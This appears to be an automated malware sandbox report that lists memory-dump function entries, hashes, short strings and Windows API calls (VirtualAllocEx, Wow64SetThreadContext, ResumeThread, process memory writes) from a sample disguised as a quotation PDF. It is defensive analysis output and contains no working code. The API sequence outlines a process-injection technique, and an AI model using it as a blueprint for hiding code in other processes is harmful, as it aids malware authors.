                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 9bf6710f7ecfef23ac7251592d55ed1ba372277264f5691bdca75b118b980626
                                                    • Instruction ID: 31ba229dc82bd687a863e75f98ec172a679f56fab59da57c7f959c2c8e5da1f2
                                                    • Opcode Fuzzy Hash: 9bf6710f7ecfef23ac7251592d55ed1ba372277264f5691bdca75b118b980626
                                                    • Instruction Fuzzy Hash: DB214AB190034A9FCB10DFAAC845BDEBBF5FF48310F14842AE519A7241C7789955DF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07483C9E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: adf29cce941c54ef3a123c6460b5ed028f3a2b65dde874f4e20ff2612f9928c0
                                                    • Instruction ID: 8d91435e9a14a866c9b007e9b3f3fb77d57d2a366f5d49bc705e494ac4dfb957
                                                    • Opcode Fuzzy Hash: adf29cce941c54ef3a123c6460b5ed028f3a2b65dde874f4e20ff2612f9928c0
                                                    • Instruction Fuzzy Hash: 9D2138B19003098FDB10DFAAC4857EEFBF4EF89324F14842AD419A7240CB789945CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0748417E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 735652d7f2d45f66c53a78b268d81117c30021cf2c914e35bd497dea876bf10c
                                                    • Instruction ID: 73f80334104d7dd77066ecfe8d56c609847143ee8e267ba34c0b0550e2e3e4af
                                                    • Opcode Fuzzy Hash: 735652d7f2d45f66c53a78b268d81117c30021cf2c914e35bd497dea876bf10c
                                                    • Instruction Fuzzy Hash: B71159B59003499FCB10DFA9C848ADEFFF5EF88320F24841AE519A7250C7359555DFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0748417E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: fcffce7b7d1d87622b8d69328784d0bd2aaf9aaefb7f4b297609d0a531384bce
                                                    • Instruction ID: 75680052c68371e6d00783f482069e6c28b5da4a6e1d0de9e742adbbaa89737e
                                                    • Opcode Fuzzy Hash: fcffce7b7d1d87622b8d69328784d0bd2aaf9aaefb7f4b297609d0a531384bce
                                                    • Instruction Fuzzy Hash: 5E1126B19003499FCB10DFAAC845ADFFFF5EB88320F24841AE519A7250C775A954DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0748417E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 2402bdad4c82e1d0ab06a8dee73b3d692c4edc137ffe38c1efd95c66a9940dff
                                                    • Instruction ID: 3b39c759dab1ca62e05cb328eb5bf036ae98e103f0a52d0dd9148beacf553f49
                                                    • Opcode Fuzzy Hash: 2402bdad4c82e1d0ab06a8dee73b3d692c4edc137ffe38c1efd95c66a9940dff
                                                    • Instruction Fuzzy Hash: DD11E5B28043894FCF129FA9D8093DFBFB0AF51314F24445BE158D7262D63A8559DBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 8bb2126f78b7d7e78df2aaff8ee0a95e7a979d4ea4b4f86492f5445afa26f258
                                                    • Instruction ID: 11c4e2ad19b000cb3848d7b563f8becba443525742fb88b9359a38705a385cb8
                                                    • Opcode Fuzzy Hash: 8bb2126f78b7d7e78df2aaff8ee0a95e7a979d4ea4b4f86492f5445afa26f258
                                                    • Instruction Fuzzy Hash: 4E1136B19003498FCB14EFAAC8457DFFBF5EB89324F24841AD519A7240CB79A944CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,bq
                                                    • API String ID: 0-2474004448
                                                    • Opcode ID: 8b6f31f64f135ca1b23cfe9c63e4337b0d7e0029fe5e9bc36015263aa1276241
                                                    • Instruction ID: 98f53b8b8e4a685a5311c5ef95823c4913d0714ea482b3aa3aecd840d16f52de
                                                    • Opcode Fuzzy Hash: 8b6f31f64f135ca1b23cfe9c63e4337b0d7e0029fe5e9bc36015263aa1276241
                                                    • Instruction Fuzzy Hash: 14C161B4A102289FDB14DF69C945BDDBBF6EF88701F158099E509AB391CB309D81CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q
                                                    • API String ID: 0-1614139903
                                                    • Opcode ID: 4ad354c6d18684dac3079772ba56e11ab632cee3c0009cd3e5de1b1a23985efa
                                                    • Instruction ID: 862b45e65296dbebff7cc093159603da08d148aaada3a1debab30ea30a108244
                                                    • Opcode Fuzzy Hash: 4ad354c6d18684dac3079772ba56e11ab632cee3c0009cd3e5de1b1a23985efa
                                                    • Instruction Fuzzy Hash: 22A11F74A10159CFCB08EFA4D894E9DBBB2FF89300F518159E905AB3A5DB30EC46CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq
                                                    • API String ID: 0-149360118
                                                    • Opcode ID: fa1dea80d6c752f5024b8ff4adff5f2d49bfe213c5cca7d2b0dc3a2a9c97a26d
                                                    • Instruction ID: 861190089224b86bc5661fca55a705881fa57fbc0d339fe0c2caf42c35c3f29f
                                                    • Opcode Fuzzy Hash: fa1dea80d6c752f5024b8ff4adff5f2d49bfe213c5cca7d2b0dc3a2a9c97a26d
                                                    • Instruction Fuzzy Hash: 8C51C5753142554FC758DF39C858A2E7BE6EF89610B158069E946CB3E2CF34DD02CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq
                                                    • API String ID: 0-149360118
                                                    • Opcode ID: 2d2db3ebad1ee878a245bf3adf389268f3e1fe243d1a9d68970417ab86710656
                                                    • Instruction ID: c031d073e2d13a05ae0be243f5771d93e0b512e9e0591370b8341da72ffc9d28
                                                    • Opcode Fuzzy Hash: 2d2db3ebad1ee878a245bf3adf389268f3e1fe243d1a9d68970417ab86710656
                                                    • Instruction Fuzzy Hash: 06519F36704254AFCB069F68D814D597FB6EF89310B1680E6E609CF2B2CB32DD15DBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q
                                                    • API String ID: 0-1614139903
                                                    • Opcode ID: d57d99b1dd1de8da64d7597f6e8fc520285730afbddd081b03ed94161b4eb93d
                                                    • Instruction ID: 3785df9b55b63a50ccea3b1faeacad3988b261cec0ea99f16419f3d90aa02330
                                                    • Opcode Fuzzy Hash: d57d99b1dd1de8da64d7597f6e8fc520285730afbddd081b03ed94161b4eb93d
                                                    • Instruction Fuzzy Hash: 7D4151B07206548FCB04FBA4D464A6EB7B7AF89700F108519D502AB3E5DF749D468BE2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q
                                                    • API String ID: 0-1614139903
                                                    • Opcode ID: 9e71717ebc250dcb1b0fc208a3417de1d4bdf8fe92416760f84b6c2e334a1864
                                                    • Instruction ID: d6b2116ed73be9717ebc988b2ee65a9766595d22edf9f05152564b002210937a
                                                    • Opcode Fuzzy Hash: 9e71717ebc250dcb1b0fc208a3417de1d4bdf8fe92416760f84b6c2e334a1864
                                                    • Instruction Fuzzy Hash: 8E4150B13006519FD708DB69C855B2A7BE6AF89705F104458E60A8F3E2CF75EC42C7E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q
                                                    • API String ID: 0-1614139903
                                                    • Opcode ID: 8b2e4154e7b7d9a752ad5b5f5df880e35ee8bcb72e5776c8d1982fd8cdf80c72
                                                    • Instruction ID: 9ca5899cf3e867bbb29d4434b186988c93bc299468b4da86bff96f8efcd10e76
                                                    • Opcode Fuzzy Hash: 8b2e4154e7b7d9a752ad5b5f5df880e35ee8bcb72e5776c8d1982fd8cdf80c72
                                                    • Instruction Fuzzy Hash: 9B314FB13006119FD708DB69C459B1A77EAAF8C705F104468E60A8B3E2CF75EC42C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2222091925.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_f70000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te^q
                                                    • API String ID: 0-671973202
                                                    • Opcode ID: 9b08ac9b33d59960a857da9d71a0c48f5e65ae1cb8bbb3d9a2b9e9c4e5f39975
                                                    • Instruction ID: ee56d678a9f17aeb266ae3b3b4eb17a312695b87387798b5bbe137a33200a2b9
                                                    • Opcode Fuzzy Hash: 9b08ac9b33d59960a857da9d71a0c48f5e65ae1cb8bbb3d9a2b9e9c4e5f39975
                                                    • Instruction Fuzzy Hash: 2231C571A04349DBCB159FA8C84969E7BB2EF85310F14847FE4499B361CF749C4AEB82
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q
                                                    • API String ID: 0-1614139903
                                                    • Opcode ID: 9b82df1b86270f0d8a5d2a1734e84b25955886ec7b4aaf00a2a78d32fd826b19
                                                    • Instruction ID: da70cd6ac875036a8b4edf4776a78e426fabd292f357a9e851b8eeda89ba05ae
                                                    • Opcode Fuzzy Hash: 9b82df1b86270f0d8a5d2a1734e84b25955886ec7b4aaf00a2a78d32fd826b19
                                                    • Instruction Fuzzy Hash: 4531A0716001159FCF04DFA4D855AA97FB6EF8C310B1144A9E90A9B3A2CB31DC46DB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2222091925.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_f70000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te^q
                                                    • API String ID: 0-671973202
                                                    • Opcode ID: 0ef1ad07e3f1cd7d8fa14b880cc81afa3943307fa5943b2a5d0a9c09e0e352cf
                                                    • Instruction ID: cd9802a1b1f6ef521d98c99b94cb846928713a718a088412056c0e459150d8c0
                                                    • Opcode Fuzzy Hash: 0ef1ad07e3f1cd7d8fa14b880cc81afa3943307fa5943b2a5d0a9c09e0e352cf
                                                    • Instruction Fuzzy Hash: A8218030E003499BDB189FA9D8456AEBBF2BF84310F14842AE40AD7361CF759D49EB42
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2222091925.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_f70000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te^q
                                                    • API String ID: 0-671973202
                                                    • Opcode ID: a39b29a0509ee069bd7b0b8f34474f3fb54e72bc29068c4d62396f3a331ccf42
                                                    • Instruction ID: 559c111bb2f8092fb4229f4acc4f79a70367c6b62d7fb2ee52533590de097c70
                                                    • Opcode Fuzzy Hash: a39b29a0509ee069bd7b0b8f34474f3fb54e72bc29068c4d62396f3a331ccf42
                                                    • Instruction Fuzzy Hash: BF217131F002459BDB189B69DC5976EBBB2BF84310F14842AE40AD7361CF749D49EB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2234254603.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: A
                                                    • API String ID: 0-3554254475
                                                    • Opcode ID: f2d4e39f662b74133fffaebee972cdf4a4b6fe8b4e0137dc792a50da9073f524
                                                    • Instruction ID: d9f6b8789ef178a320df3cb96723f4015f955074e8a7feee028a7606cfbccf49
                                                    • Opcode Fuzzy Hash: f2d4e39f662b74133fffaebee972cdf4a4b6fe8b4e0137dc792a50da9073f524
                                                    • Instruction Fuzzy Hash: 56F0F23180465A9BCF129F54CC44ACAB772FF99300F109A85A94937224DB31AAD68F50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2234254603.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C
                                                    • API String ID: 0-1037565863
                                                    • Opcode ID: a1a1132663a0b295a8752ba6ef07eb97f749bb1366cff0dd8b252c6cc5807af1
                                                    • Instruction ID: da71e261d732e9bdcc2a4611a3e8d800f2932f06cad11dc8b2ede450dbde316d
                                                    • Opcode Fuzzy Hash: a1a1132663a0b295a8752ba6ef07eb97f749bb1366cff0dd8b252c6cc5807af1
                                                    • Instruction Fuzzy Hash: 46F0AE78804229CFDB64CF10C888BE9BBB2AB04315F10A8D6980A63290DB784BC9CF41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2234254603.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 3
                                                    • API String ID: 0-1842515611
                                                    • Opcode ID: 57ae8f5ec73da39cb3840fde3676df74b8760db5fc831aee54e0de9c955397ca
                                                    • Instruction ID: a6cdd0b3608d6853ac3c30a90c7d9278d84b6980ea65ae69781e4a07da82a816
                                                    • Opcode Fuzzy Hash: 57ae8f5ec73da39cb3840fde3676df74b8760db5fc831aee54e0de9c955397ca
                                                    • Instruction Fuzzy Hash: 89E0E578901228EBDB21CF90DD88BDCBBB1FB04700F209999A60A73291CB751AC5CF44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2234254603.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: G
                                                    • API String ID: 0-985283518
                                                    • Opcode ID: 12a4b573b9861faac4536791a82962c9b19413b0f373a817dd0e063eebabc58d
                                                    • Instruction ID: 62fb50ec46d32a31d79ef44bfe2b3974cc2221a3786111a3ecb1a77c6d6032e2
                                                    • Opcode Fuzzy Hash: 12a4b573b9861faac4536791a82962c9b19413b0f373a817dd0e063eebabc58d
                                                    • Instruction Fuzzy Hash: D0D06C78904268CFCB21CF56D888A98BBF6BB08301F005599D50EA7365DB34AA41CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1449007c7b920f7d555a68babdc576e201af7145e59ca2f043f86abd27103bd
                                                    • Instruction ID: 24d2f9fe4a17953c4bae9dd66fc78b459ae6f7a87fa4ff6719614e627375459d
                                                    • Opcode Fuzzy Hash: e1449007c7b920f7d555a68babdc576e201af7145e59ca2f043f86abd27103bd
                                                    • Instruction Fuzzy Hash: 17120E74A10219CFCB14EF64C894B9DB7B2BF89300F5185A8D549AB396DF30AD85CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2234254603.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6d715e75785d62c7cf30e0cc81e62dd0a57e8b66477ab8d02b795e2a521959bf
                                                    • Instruction ID: 1e83880b679edec0aeb365b7a7ae3e5f61f6c017e66bbdc761ca90a75c9c5aad
                                                    • Opcode Fuzzy Hash: 6d715e75785d62c7cf30e0cc81e62dd0a57e8b66477ab8d02b795e2a521959bf
                                                    • Instruction Fuzzy Hash: ADB1F470E06218CFDB54DF69D844BADBBF2FB49300FA1A5AAD009A7295DB705E81CF41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 91ce49f8c27de8c6b171e68b66d1a05b3e25c12eaf15ea21645ebfd59aa423c1
                                                    • Instruction ID: e936cd3debf6eeb5d06231cfc72fd523481ac6b1f71eb4739d5e5ff6f277aa71
                                                    • Opcode Fuzzy Hash: 91ce49f8c27de8c6b171e68b66d1a05b3e25c12eaf15ea21645ebfd59aa423c1
                                                    • Instruction Fuzzy Hash: 86A11FB4A10215CFCB14DF64C894B99BBB2BF89300F5185A8D54AAB392DF70ED85CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e9f5790f9e6b39c269a52e8f0748cdf6843f84e2b18144fcad2967dfa73a06fe
                                                    • Instruction ID: 992de5c5393764a28ac16fd446383815e761b21e55db1e80292906173dc8fcdc
                                                    • Opcode Fuzzy Hash: e9f5790f9e6b39c269a52e8f0748cdf6843f84e2b18144fcad2967dfa73a06fe
                                                    • Instruction Fuzzy Hash: 13912B74B20215DFCB04EF68D494A6DBBF6BF89710F148169E5469B3A2CB70EC41CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2234254603.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c5b47cb83f610d4e72ea103afe12290aeb72bff1aa9089b29d8aa02b20a3cd7c
                                                    • Instruction ID: 6842d8252de317ef582c45bd099d588534090c9f8f30bb8218721f59a346d956
                                                    • Opcode Fuzzy Hash: c5b47cb83f610d4e72ea103afe12290aeb72bff1aa9089b29d8aa02b20a3cd7c
                                                    • Instruction Fuzzy Hash: 53A13B70E00208CFCB54EFA8E889B9DBBB2FB49304F51946AD409AB399DB705D81CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2222091925.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_f70000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 32a981393d47beed502ba7c696723f97dec5e9e8fca1e93fab24c654538531c7
                                                    • Instruction ID: 3be1ae785432825ebcf13b1c821f3ebfdae3ded0625fa00391428688cba38027
                                                    • Opcode Fuzzy Hash: 32a981393d47beed502ba7c696723f97dec5e9e8fca1e93fab24c654538531c7
                                                    • Instruction Fuzzy Hash: 8561BE74E043489FCB05DFB9C8556AEBBF5EF89310F14846AE509D7341DA389E068BA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 81628543ed00b6ef95e63c808856379f08bee91184565dfd71df493366a1e136
                                                    • Instruction ID: 39ef2fbd176d2d7423b82c8c34bf84f013b49c757704911346a486b749097d20
                                                    • Opcode Fuzzy Hash: 81628543ed00b6ef95e63c808856379f08bee91184565dfd71df493366a1e136
                                                    • Instruction Fuzzy Hash: 048107B9A106198FCB14DF68C48499EB7F5FF88711F158169E8169B3B1DB30ED42CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2234254603.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e1a38916bb5b76a471a34c594b824038f51fe155685d499458d08ce3f43cd7f
                                                    • Instruction ID: 14de9dc8cbd0b102e5670bbbc5dc09c8577288ad8e7608a599c1bf0d2e576800
                                                    • Opcode Fuzzy Hash: 5e1a38916bb5b76a471a34c594b824038f51fe155685d499458d08ce3f43cd7f
                                                    • Instruction Fuzzy Hash: 91914B70E04208CFDB14EFA8E848B9DBBB2FB49304F51946AD409AB399DB705E85CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dac10c5e9591196259563a56350b92f5a5dc745ff8f917705495cb98344aef65
                                                    • Instruction ID: cf133af21a75dbb72b32fe2299da00fbc3674449b06ffb07d93fb6a15e27c9f2
                                                    • Opcode Fuzzy Hash: dac10c5e9591196259563a56350b92f5a5dc745ff8f917705495cb98344aef65
                                                    • Instruction Fuzzy Hash: 2A613B74B20115DFCB04EF68D494AADB7B6FF89710F108169E9469B3A2CB30EC41CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2234254603.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ef7c36a7946f83b550a0f27ff4c8401f12e96fd65be0cc502297da5dfa135f30
                                                    • Instruction ID: dabbd6db503c82402ae596a1ce6c24c5cea77f75eb26682cda4e246815a1fdfa
                                                    • Opcode Fuzzy Hash: ef7c36a7946f83b550a0f27ff4c8401f12e96fd65be0cc502297da5dfa135f30
                                                    • Instruction Fuzzy Hash: 37814974D05268CFDBA1CF29C884BD9BBF1BB49304F4095EAA54DA7240DB719AC5CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

